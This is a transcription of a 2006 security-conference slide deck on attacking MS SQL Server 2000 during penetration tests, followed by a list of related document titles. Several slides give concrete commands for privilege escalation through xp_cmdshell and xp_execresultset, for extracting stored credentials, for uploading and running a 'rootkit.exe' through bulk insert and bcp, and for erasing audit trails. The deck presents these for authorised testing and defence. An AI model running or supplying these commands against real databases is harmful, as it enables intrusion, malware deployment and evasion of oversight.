Violating The Corporate Database. Presented by Dan Cornforth Brightstar, IT Security Summit, April 2006
|
|
|
- Nora Lawson
- 10 years ago
- Views:
Transcription
1 Violating The Corporate Database Presented by Dan Cornforth Brightstar, IT Security Summit, April 2006 Copyright Security-Assessment.com 2005
2 Disclaimer: This presentation aims to focus on some of the more common attack methods used during a SQL 2000 penetration test. Using these tools and methods against a host without the owners explicit consent, constitutes an offence.
3 Overview: Database basics Data structures MS SQL authentication concepts Historical profile of MS SQL Potential attacker profile Identifying MS SQL targets Basic tools Authentication quick wins Escalating privileges Uploading executables Covering tracks
4 In Scope: MS SQL 2000 Internal attacks against the corporate database Attacks against communication protocols Gaining privileges Escalating privileges Maintaining access to the database Manipulation of audit trails Defending against the above
5 Out of Scope: SQL injection attacks through web applications Web logic vulnerabilities relating to SQL injection Attacks associated with vendor released patches
6 Potential Attacker Profile: Anyone who can send data on tcp port 1433 or via named pipes to our MS SQL database Anyone with access to a flat or un-segmented corporate network hosting MS SQL 2000
7 Assumed Attackers Goals: Repeated access to the data DB access with the highest privileges possible Access with a minimum of audit trails
8 What Do We Store In Databases: Everything Built in data types User defined data types
9 Some Basics (Terminology): The Structure Query Language (SQL) Variations on a standard Microsoft s/sybase T-SQL Oracles PL/SQL Subgroups under ANSI DDL (Data Definition Language) DML (Data Manipulation Language)
10 Some Basics (Data Structure): Database Table Columns Rows
11 Table:
12 Column:
13 Row, Tuple or Record:
14 MS SQL Database Authorisation Concepts: SQL Server Roles Server Roles sysadmin dbcreator bulkadmin Database Roles db_datareader db_owner Application Roles
15 Microsoft SQL Profile: Code history Vulnerability stats Maturity as a product Market share
16 Identifying Targets: Sniffing nmap (tcp 1433, 2433, udp 1434) SQLping2 osql.exe
17 Authentication & Authorisation: Windows (NTLM, LANMAN, etc) SQL Authentication & Windows (Mixed)
18
19 Authentication Quick Wins (Overview): Default accounts Sniffing Stored credential access, database build files, remote registry enumeration, web application source Brute Force sqldict.exe and other tools
20 Quick Wins (Default Accounts): sa (sysadmin server role member) distributor_admin (sysadmin too if created)
21 Quick Win Credential Sniffing: SQL TDS (Tabular Data Stream) login packets Windows authentication credentials, named pipes Mitigation and trade-offs
22 text: text
23
24 Quick Win Local File Access (setup.iss):
25 Brute Forcing SQL: SQLdict.exe noisy and clumsy
26 Stored Procedures: Stored Procedures Variables Loops Conditional logic Extended Stored Procedures Usually written in C/C++ Called via the Open Data Services API SQL 2000 ships with a huge amount of ready made SP_ s and XP_ s
27 Some Dangerous Stored Procedures: xp_cmdshell xp_regread xp_instanceregread xp_regwrite xp_readerrorlog sp_addextendedproc sp_addsrvrolemember Many more e.g. EXEC xp_regread HKEY_LOCAL_MACHINE\SYSTEM\CurrentControlSet \Services\SQLSERVERAGENT, ObjectName
28
29
30 text: text
31 Escalating Privileges #1: xp_displayparamstmt xp_execresultset xp_printstatements e.g. exec xp_execresultset N exec master..xp_cmdshell dir >c:\dir_list.txt,n master exec xp_execresultset N exec sp_addrolemember db_owner, lowlevel_user,n master
32 Escalating Privileges #2: The SQL Server Agent account password attack Stores SQL authentication details in the registry under the Local Security Authority key: HKLM\SECURITY\Policy\Secrets\SQLSERVERAGE NT_HostPassword\CurrVal exec msdb..sp_get_sqlagent_properties Decrypt the returned value:
33 Escalating Privileges #3: Data Transformation Packages (DTS) Package Password retrieval sp_enum_dtspackages to enumerate configured packages sp_get_dtpackages to retrieve those packages enumerated DTSconnpass to decrypt the connection passwords from the returned data:
34 Streaming Binary Files to the DB: Step 1 (from the attackers database): create table temp (data text) bulk insert temp from c:\tools\rootkit.exe with (codepage= RAW ) Step 2 (at the corporate database): exec xp_cmdshell bcp select * from temp queryout rootkit.exe -c Craw S Usa Ppassword Step 3 (at the corporate databse): exec master..xp_cmdshell c:\temp\rootkit.exe
35 Covering Tracks: Use of sp_password Useful where C2 grade auditing is enabled Can be used in a comment field -- Removal of c:\windows\system32\config\*.evt The 3 byte SQL runtime patch Must first call VirtualProtect() Not a trivial attack The patch will not survive system reboot Complete unauthorised access requires two runtime patches
36 Conclusions: The most secure database is the one your DBA knows the most about The functionality added by stored procedures can be a databases greatest downfall The principal of least privilege should be exercised at all times and at all levels Host and network based IDS systems may catch a small percentage of these attacks but never all Experience shows that most instances of SQL in the corporate environment can be compromised due to: poorly applied database permissions missing SQL service packs an elevated process execution context
37 Resources: Chip Andrews SQL Security site David Litchfield & Chris Anley NIST Secure Technical Implementation Guides Database Journal Microsoft SQL Server Security Resource
38 Questions:
Manipulating Microsoft SQL Server Using SQL Injection
Manipulating Microsoft SQL Server Using SQL Injection Author: Cesar Cerrudo ([email protected]) APPLICATION SECURITY, INC. WEB: E-MAIL: [email protected] TEL: 1-866-9APPSEC 1-212-947-8787 INTRODUCTION
Hunting flaws in Microsoft SQL Server
Hunting flaws in Microsoft SQL Server Cesar Cerrudo Independant Security Researcher Aaron Newman CTO/Founder, Application Security, Inc. www.appsecinc.com 1 Outline Collecting passwords Elevating privileges
NNT CIS Microsoft SQL Server 2008R2 Database Engine Level 1 Benchmark Report 0514a
NNT CIS Microsoft SQL Server 2008R2 Database Engine Level 1 Benchmark Report 0514a: WIN- 2LR8M18J6A1 On WIN-2LR8M18J6A1 - By admin for time period 6/10/2014 8:59:44 AM to 6/10/2014 8:59:44 AM NNT CIS Microsoft
Microsoft SQL Server Security & Auditing. March 23, 2011 ISACA Chapter Meeting
Microsoft SQL Server Security & Auditing March 23, 2011 ISACA Chapter Meeting Agenda Introduction SQL Server Product Description SQL Security Basics Security System Views Evolution of Tool Set for Auditing
Microsoft SQL Server Security Best Practices
Microsoft SQL Server Security Best Practices This white paper contains administrative and operational best practices that should be performed from a security perspective when using Microsoft SQL Server.
SQL SERVER Anti-Forensics. Cesar Cerrudo
SQL SERVER Anti-Forensics Cesar Cerrudo Introduction Sophisticated attacks requires leaving as few evidence as possible Anti-Forensics techniques help to make forensics investigations difficult Anti-Forensics
May 17, 2011 SQL SERVER SECURITY GRANTING, CONTROLLING, AND AUDITING DATABASE ACCESS. Mike Fal - www.mikefal.net
May 17, 2011 SQL SERVER SECURITY GRANTING, CONTROLLING, AND AUDITING DATABASE ACCESS Mike Fal Working with SQL Server since MSSQL 7. Currently supporting 100+ servers with varying requirements. Blog www.mikefal.net
FREQUENTLY ASKED QUESTIONS
FREQUENTLY ASKED QUESTIONS Secure Bytes, October 2011 This document is confidential and for the use of a Secure Bytes client only. The information contained herein is the property of Secure Bytes and may
MS-55096: Securing Data on Microsoft SQL Server 2012
MS-55096: Securing Data on Microsoft SQL Server 2012 Description The goal of this two-day instructor-led course is to provide students with the database and SQL server security knowledge and skills necessary
NEW AND IMPROVED: HACKING ORACLE FROM WEB. Sumit sid Siddharth 7Safe Limited UK
NEW AND IMPROVED: HACKING ORACLE FROM WEB Sumit sid Siddharth 7Safe Limited UK About 7Safe Part of PA Consulting Group Security Services Penetration testing PCI-DSS Forensics Training E-discovery About
Securing Data on Microsoft SQL Server 2012
Securing Data on Microsoft SQL Server 2012 Course 55096 The goal of this two-day instructor-led course is to provide students with the database and SQL server security knowledge and skills necessary to
Securing Database Servers. Database security for enterprise information systems and security professionals
Securing Database Servers Database security for enterprise information systems and security professionals Introduction: Database servers are the foundation of virtually every Electronic Business, Financial,
Hacking Database for Owning your Data
Hacking Database for Owning your Data 1 Introduction By Abdulaziz Alrasheed & Xiuwei Yi Stealing data is becoming a major threat. In 2012 alone, 500 fortune companies were compromised causing lots of money
Hacking databases for owning your data. Cesar Cerrudo Esteban Martinez Fayo Argeniss (www.argeniss.com)
Hacking databases for owning your data Cesar Cerrudo Esteban Martinez Fayo Argeniss (www.argeniss.com) Overview Introduction Why database security? How databases are hacked? Oracle Database Server attacks
Database Assessment. Vulnerability Assessment Course
Database Assessment Vulnerability Assessment Course All materials are licensed under a Creative Commons Share Alike license. http://creativecommons.org/licenses/by-sa/3.0/ 2 Agenda Introduction Configuration
Guarding Against SQL Server Attacks: Hacking, cracking, and protection techniques.
Guarding Against SQL Server Attacks: Hacking, cracking, and protection techniques. In this information age, the data server has become the heart of a company. This one piece of software controls the rhythm
Penetration Testing: Advanced Oracle Exploitation Page 1
Penetration Testing: Advanced Oracle Exploitation Page 1 Course Index:: Day 1 Oracle RDBMS and the Oracle Network Architecture... 3» Introduction and Oracle Review...3» Service Information Enumeration:...3»
Thick Client Application Security
Thick Client Application Security Arindam Mandal ([email protected]) (http://www.paladion.net) January 2005 This paper discusses the critical vulnerabilities and corresponding risks in a two
MAGIC Telephone Hybrid System - SQL Migration - using the example Wolfgang Peters 1 Overview of the SQL Migration Requirements Remarks for Windows 7 Users Hardware requirements SQL-Server Software requirements
Oracle PL/SQL Injection
Oracle PL/SQL Injection David Litchfield What is PL/SQL? Procedural Language / Structured Query Language Oracle s extension to standard SQL Programmable like T-SQL in the Microsoft world. Used to create
BLIND SQL INJECTION (UBC)
WaveFront Consulting Group BLIND SQL INJECTION (UBC) Rui Pereira,B.Sc.(Hons),CISSP,CIPS ISP,CISA,CWNA,CPTS/CPTE WaveFront Consulting Group Ltd [email protected] www.wavefrontcg.com 1 This material
Medical Device Security Health Group Digital Output
Medical Device Security Health Group Digital Output Security Assessment Report for the Kodak Color Medical Imager 1000 (CMI-1000) Software Version 1.1 Part Number 1G0434 Revision 2.0 June 21, 2005 CMI-1000
Hack Your SQL Server Database Before the Hackers Do
Note: This article was edited in Oct. 2013, from numerous Web Sources. TJS At the Install: The default install for SQL server makes it is as secure as it will ever be. DBAs and developers will eventually
Locking down a Hitachi ID Suite server
Locking down a Hitachi ID Suite server 2016 Hitachi ID Systems, Inc. All rights reserved. Organizations deploying Hitachi ID Identity and Access Management Suite need to understand how to secure its runtime
External Vulnerability Assessment. -Technical Summary- ABC ORGANIZATION
External Vulnerability Assessment -Technical Summary- Prepared for: ABC ORGANIZATI On March 9, 2008 Prepared by: AOS Security Solutions 1 of 13 Table of Contents Executive Summary... 3 Discovered Security
Internal Penetration Test
Internal Penetration Test Agenda Time Agenda Item 10:00 10:15 Introduction 10:15 12:15 Seminar: Web Application Penetration Test 12:15 12:30 Break 12:30 13:30 Seminar: Social Engineering Test 13:30 15:00
SQL Injection. The ability to inject SQL commands into the database engine through an existing application
SQL Injection The ability to inject SQL commands into the database engine through an existing application 1 What is SQL? SQL stands for Structured Query Language Allows us to access a database ANSI and
Security and Control Issues within Relational Databases
Security and Control Issues within Relational Databases David C. Ogbolumani, CISA, CISSP, CIA, CISM Practice Manager Information Security Preview of Key Points The Database Environment Top Database Threats
GUIDE TO SYBASE SECURITY
GUIDE TO SYBASE SECURITY [email protected] Company: Network Intelligence India Pvt. Ltd. http://www.nii.co.in Date: 31 st January 2003 Guide to Sybase Security Introduction: This article provides a detailed
Nessus scanning on Windows Domain
Nessus scanning on Windows Domain A little inside information and Nessus can go a long way By Sunil Vakharia [email protected] Version 1.0 4 November 2003 About this paper This paper is not a tutorial
Database Auditing: Best Practices. Rob Barnes, CISA Director of Security, Risk and Compliance Operations [email protected]
Database Auditing: Best Practices Rob Barnes, CISA Director of Security, Risk and Compliance Operations [email protected] Verizon 2009 Data Breach Investigations Report: 285 million records were compromised
BM482E Introduction to Computer Security
BM482E Introduction to Computer Security Lecture 7 Database and Operating System Security Mehmet Demirci 1 Summary of Lecture 6 User Authentication Passwords Password storage Password selection Token-based
SQL Server Hardening
Considerations, page 1 SQL Server 2008 R2 Security Considerations, page 4 Considerations Top SQL Hardening Considerations Top SQL Hardening considerations: 1 Do not install SQL Server on an Active Directory
Top 10 Database. Misconfigurations. [email protected]
Top 10 Database Vulnerabilities and Misconfigurations Mark Trinidad [email protected] Some Newsworthy Breaches From 2011 2 In 2012.. Hackers carry 2011 momentum in 2012 Data theft, hacktivism, espionage
Penetration Testing Report Client: Business Solutions June 15 th 2015
Penetration Testing Report Client: Business Solutions June 15 th 2015 Acumen Innovations 80 S.W 8 th St Suite 2000 Miami, FL 33130 United States of America Tel: 1-888-995-7803 Email: [email protected]
Advanced SQL Injection in Oracle databases. Esteban Martínez Fayó
Advanced SQL Injection in Oracle databases Esteban Martínez Fayó February 2005 Outline Introduction SQL Injection attacks How to exploit Exploit examples SQL Injection in functions defined with AUTHID
DBMoto 6.5 Setup Guide for SQL Server Transactional Replications
DBMoto 6.5 Setup Guide for SQL Server Transactional Replications Copyright This document is copyrighted and protected by worldwide copyright laws and treaty provisions. No portion of this documentation
Penetration Testing with Kali Linux
Penetration Testing with Kali Linux PWK Copyright 2014 Offensive Security Ltd. All rights reserved. Page 1 of 11 All rights reserved to Offensive Security, 2014 No part of this publication, in whole or
Windows SharePoint Services Installation Guide
Windows SharePoint Services Installation Guide [email protected] www.schmittdotnet.com Version 1.4 10/11/2010 Copyright and Disclaimers This guide is for informational purposes only. THE AUTHOR
Medical Device Security Health Imaging Digital Capture. Security Assessment Report for the Kodak DryView 8150 Imager Release 1.0.
Medical Device Security Health Imaging Digital Capture Security Assessment Report for the Kodak DryView 8150 Imager Release 1.0 Page 1 of 9 Table of Contents Table of Contents... 2 Executive Summary...
Improved Penetration Testing of Web Apps and Databases with MatriXay
Improved Penetration Testing of Web Apps and Databases with MatriXay Yuan Fan GCIH,GCIA,CISSP [email protected] Xiao Rong CISSP,ITIL [email protected] Background Database Portion Overview
ABC LTD EXTERNAL WEBSITE AND INFRASTRUCTURE IT HEALTH CHECK (ITHC) / PENETRATION TEST
ABC LTD EXTERNAL WEBSITE AND INFRASTRUCTURE IT HEALTH CHECK (ITHC) / PENETRATION TEST Performed Between Testing start date and end date By SSL247 Limited SSL247 Limited 63, Lisson Street Marylebone London
Oracle Database Security
breaking through barriers to progress By Raman Jathar an award winning '2004 Future 50 Company' 18650 W. Corporate Drive Suite 120 Brookfield, WI 53045 262.792.0200 Database Security Lately, database security
A Forensic Investigation of PL/SQL Injection Attacks in Oracle 1 st July 2010 David Litchfield
A Forensic Investigation of PL/SQL Injection Attacks in Oracle 1 st July 2010 David Litchfield PL/SQL injection vulnerabilities are one of the more commonly found security flaws in the Oracle database
Different ways to guess Oracle database SID
30 October 2008 Different ways to guess Oracle database SID Digitаl Security Research Group (DSecRG) Alexander Polyakov [email protected] http://dsecrg.ru Content Introduction...3 A brief info about SID
Auditing Data Access Without Bringing Your Database To Its Knees
Auditing Data Access Without Bringing Your Database To Its Knees Black Hat USA 2006 August 1-3 Kimber Spradlin, CISA, CISSP, CPA Sr. Manager Security Solutions Dale Brocklehurst Sr. Sales Consultant Agenda
Ch.5 Database Security. Ch.5 Database Security Review
User Authentication Access Control Database Security Ch.5 Database Security Hw_Ch3, due today Hw_Ch4, due on 2/23 Review Questions: 4.1, 4.3, 4.6, 4.10 Problems: 4.5, 4.7, 4.8 How about the pace of the
Database Security SQL Server 2012
Database Security SQL Server 2012 Russ McMahon Associate Prof of Information Technology CECH UC 1 of only 21 ABET accredited programs in the US Jasmine Hix Senior IT (Software Dev) Helped with the slides
CYBERTRON NETWORK SOLUTIONS
CYBERTRON NETWORK SOLUTIONS CybertTron Certified Ethical Hacker (CT-CEH) CT-CEH a Certification offered by CyberTron @Copyright 2015 CyberTron Network Solutions All Rights Reserved CyberTron Certified
MAGIC THipPro - SQL Server Installation - using the example of
MAGIC THipPro - SQL Server Installation - using the example of Express Wolfgang Peters 1 Installation of the SQL Server Configuration of the SQL Server Create SQL User Create empty database Install SQL
Securing SQL Server. Protecting Your Database from. Second Edition. Attackers. Denny Cherry. Michael Cross. Technical Editor ELSEVIER
Securing SQL Server Second Edition Protecting Your Database from Attackers Denny Cherry Technical Editor Michael Cross AMSTERDAM BOSTON HEIDELBERG LONDON ELSEVIER NEW YORK OXFORD PARIS SAN DIEGO SAN FRANCISCO
Pre-Installation Guide
Pre-Installation Guide Version 8.2 December 11, 2015 For the most recent version of this document, visit our documentation website. Table of Contents 1 Pre-installation overview 4 2 Windows updates 4 3
SQL Injection 2.0: Bigger, Badder, Faster and More Dangerous Than Ever. Dana Tamir, Product Marketing Manager, Imperva
SQL Injection 2.0: Bigger, Badder, Faster and More Dangerous Than Ever Dana Tamir, Product Marketing Manager, Imperva Consider this: In the first half of 2008, SQL injection was the number one attack vector
Metasploit The Elixir of Network Security
Metasploit The Elixir of Network Security Harish Chowdhary Software Quality Engineer, Aricent Technologies Shubham Mittal Penetration Testing Engineer, Iviz Security And Your Situation Would Be Main Goal
Cisco Process Orchestrator 3.2.1 Installation Guide
Cisco Process Orchestrator 3.2.1 Installation Guide Release 3.2.1 Published: February 11, 2016 Cisco Systems, Inc. www.cisco.com CiscoSans Cisco Process Orchestrator 3.2.1 Installation Guide THE SPECIFICATIONS
Achieving PCI COMPLIANCE with the 2020 Audit & Control Suite. www.lepide.com/2020-suite/
Achieving PCI COMPLIANCE with the 2020 Audit & Control Suite 7. Restrict access to cardholder data by business need to know PCI Article (PCI DSS 3) Report Mapping How we help 7.1 Limit access to system
Immotec Systems, Inc. SQL Server 2005 Installation Document
SQL Server Installation Guide 1. From the Visor 360 installation CD\USB Key, open the Access folder and install the Access Database Engine. 2. Open Visor 360 V2.0 folder and double click on Setup. Visor
Automating SQL Injection Exploits
Automating SQL Injection Exploits Mike Shema IT Underground, Berlin 2006 Overview SQL injection vulnerabilities are pretty easy to detect. The true impact of a vulnerability is measured
Connecting to Manage Your MS SQL Database
Using MS SQL databases HOWTO Copyright 2001 Version 1.0 This HOWTO describes how to connect to a MS SQL database and how to transfer data to an SQL server database. Table of Contents Connecting to Manage
Database as a Service (DaaS) Version 1.02
Database as a Service (DaaS) Version 1.02 Table of Contents Database as a Service (DaaS) Overview... 4 Database as a Service (DaaS) Benefit... 4 Feature Description... 4 Database Types / Supported Versions...
Advanced SQL Injection
Advanced SQL Injection December 2012 Guillaume Loizeau Regional Sales Manager, DB Security McAfee Agenda What is SQL Injection In-band Injection Out-of-band Injection Blind Injection Advanced techniques
RSA Security Analytics
RSA Security Analytics Event Source Log Configuration Guide Microsoft SQL Server Last Modified: Thursday, July 30, 2015 Event Source Product Information: Vendor: Microsoft Event Source: SQL Server Versions:
Before deploying SiteAudit it is recommended to review the information below. This will ensure efficient installation and operation of SiteAudit.
SiteAudit Knowledge Base Deployment Check List June 2012 In This Article: Platform Requirements Windows Settings Discovery Configuration Before deploying SiteAudit it is recommended to review the information
Installing T-HUB on multiple computers
Installing T-HUB on multiple computers T-HUB can be installed on multiple computers on the same local network. T-HUB has a SQL Server database that needs to be installed on a Server or Host computer. All
Oracle Audit Vault Oracle FLEXCUBE Universal Banking Release 12.0.3.0.0 [April] [2014]
Oracle Audit Vault Oracle FLEXCUBE Universal Banking Release 12.0.3.0.0 [April] [2014] Table of Contents 1. INTRODUCTION... 1-1 1.1 SCOPE... 1-1 1.2 INTRODUCTION OF ORACLE AUDIT VAULT... 1-1 1.2.1 Advantages...
How To Set Up Safetica Insight 9 (Safetica) For A Safetrica Management Service (Sms) For An Ipad Or Ipad (Smb) (Sbc) (For A Safetaica) (
SAFETICA INSIGHT INSTALLATION MANUAL SAFETICA INSIGHT INSTALLATION MANUAL for Safetica Insight version 6.1.2 Author: Safetica Technologies s.r.o. Safetica Insight was developed by Safetica Technologies
Violating Database - Enforced Security Mechanisms
Violating Database - Enforced Security Mechanisms Runtime Patching Exploits in SQL Server 2000: a case study Chris Anley [[email protected]] 18/06/2002 An NGSSoftware Insight Security Research (NISR)
Remote Management System
RMS Copyright and Distribution Notice November 2009 Copyright 2009 ARTROMICK International, Inc. ALL RIGHTS RESERVED. Published 2009. Printed in the United States of America WARNING: ANY UNAUTHORIZED
Windows Remote Access
Windows Remote Access A newsletter for IT Professionals Education Sector Updates Issue 1 I. Background of Remote Desktop for Windows Remote Desktop Protocol (RDP) is a proprietary protocol developed by
Database 10g Edition: All possible 10g features, either bundled or available at additional cost.
Concepts Oracle Corporation offers a wide variety of products. The Oracle Database 10g, the product this exam focuses on, is the centerpiece of the Oracle product set. The "g" in "10g" stands for the Grid
Project management - integrated into Outlook
Project management - integrated into Outlook InLoox 5.x configuration guide for Microsoft SQL Server An IQ medialab / OptCon Whitepaper Published: February 2008 Author / copyright: 2008 Heinz-Peter Bross,
DB Administration COMOS. Platform DB Administration. Trademarks 1. Prerequisites. MS SQL Server 2005/2008 3. Oracle. Operating Manual 09/2011
Trademarks 1 Prerequisites 2 COMOS Platform MS SQL Server 2005/2008 3 Oracle 4 Operating Manual 09/2011 A5E03638301-01 Legal information Legal information Warning notice system This manual contains notices
Computer Security: Principles and Practice
Computer Security: Principles and Practice Chapter 24 Windows and Windows Vista Security First Edition by William Stallings and Lawrie Brown Lecture slides by Lawrie Brown Windows and Windows Vista Security
This document describes the methodology used for validating the model, analysis, comments and test results from the model s application.
Ernst & Young LLP Security & Technology Solutions Advanced Security Center Using Attack Surface Area And Relative Attack Surface Quotient To Identify Attackability Customer Information Paper TABLE OF CONTENTS
EC-Council CAST CENTER FOR ADVANCED SECURITY TRAINING. CAST 619 Advanced SQLi Attacks and Countermeasures. Make The Difference CAST.
CENTER FOR ADVANCED SECURITY TRAINING 619 Advanced SQLi Attacks and Countermeasures Make The Difference About Center of Advanced Security Training () The rapidly evolving information security landscape
Use of Commercial Backup Software with Juris (Juris 2.x w/msde)
Use of Commercial Backup Software with Juris (Juris 2.x w/msde) Juris databases hosted on a Microsoft SQL Server 2000 Desktop Engine (MSDE) instance can be backed up manually through the Juris Management
Defending the Database Techniques and best practices
ISACA Houston: Grounding Security & Compliance Where The Data Lives Mark R. Trinidad Product Manager [email protected] March 19, 2009 Agenda Understanding the Risk Changing threat landscape The target
INDUSTRIAL CONTROL SYSTEMS CYBER SECURITY DEMONSTRATION
INDUSTRIAL CONTROL SYSTEMS CYBER SECURITY DEMONSTRATION Prepared for the NRC Fuel Cycle Cyber Security Threat Conference Presented by: Jon Chugg, Ken Rohde Organization(s): INL Date: May 30, 2013 Disclaimer
Potential Targets - Field Devices
Potential Targets - Field Devices Motorola Field Devices: Remote Terminal Units ACE 3600 Front End Devices ACE IP Gateway ACE Field Interface Unit (ACE FIU) 2 Credential Cracking Repeated attempts to
STEALTHbits Technologies, Inc. StealthAUDIT v5.1 System Requirements and Installation Notes
STEALTHbits Technologies, Inc. StealthAUDIT v5.1 System Requirements and Installation Notes June 2011 Table of Contents Overview... 3 Installation Overview... 3 Hosting System Requirements... 4 Recommended
Medical Device Security Health Imaging Digital Capture. Security Assessment Report for the Kodak CR V4.1
Medical Device Security Health Imaging Digital Capture Security Assessment Report for the Kodak CR V4.1 Version 1.0 Eastman Kodak Company, Health Imaging Group Page 1 Table of Contents Table of Contents
Oracle Database 10g: Introduction to SQL
Oracle University Contact Us: 1.800.529.0165 Oracle Database 10g: Introduction to SQL Duration: 5 Days What you will learn This course offers students an introduction to Oracle Database 10g database technology.
Penetration Test Report
Penetration Test Report Acme Test Company ACMEIT System 26 th November 2010 Executive Summary Info-Assure Ltd was engaged by Acme Test Company to perform an IT Health Check (ITHC) on the ACMEIT System
State of Wisconsin Database Hosting Services Roles and Responsibilities
State of Wisconsin Hosting Services oles and esponsibilities Document evision History (Major Post Publishing evisions Only) Date Version reator Notes 12/9/2010 1.0 This document describes the Hosting Services
Top Ten Fraud Risks in the Oracle E Business Suite
Top Ten Fraud Risks in the Oracle E Business Suite Jeffrey T. Hare, CPA CISA CIA Industry Analyst, Author, Consultant ERP Risk Advisors Stephen Kost Chief Technology Officer Integrigy Corporation February
IMF Tune Quarantine & Reporting Running SQL behind a Firewall. WinDeveloper Software Ltd.
IMF Tune Quarantine & Reporting Running SQL behind a Firewall WinDeveloper Software Ltd. 1 Basic Setup Quarantine & Reporting Web Interface must be installed on the same Windows Domain as the SQL Server
Understanding Sql Injection
Understanding Sql Injection Hardik Shah Understanding SQL Injection Introduction: SQL injection is a technique used by a malicious user to gain illegal access on the remote machines through the web applications
Microsoft SQL Server Staging
Unified ICM requires that you install Microsoft SQL Server on each server that hosts a Logger or Administration & Data Server (Real Time Distributor and HDS only) component. Microsoft SQL Server efficiently
Migrating MSDE to Microsoft SQL 2008 R2 Express
How To Updated: 11/11/2011 2011 Shelby Systems, Inc. All Rights Reserved Other brand and product names are trademarks or registered trademarks of the respective holders. If you are still on MSDE 2000,
David Dye. Extract, Transform, Load
David Dye Extract, Transform, Load Extract, Transform, Load Overview SQL Tools Load Considerations Introduction David Dye [email protected] HTTP://WWW.SQLSAFETY.COM Overview ETL Overview Extract Define
Timbuktu Pro for Windows, version 8
Timbuktu Pro for Windows, version 8 Release Notes, version 8.6.8 May 2010 This document contains important information about Timbuktu Pro for Windows, version 8. If you have additional questions, consult
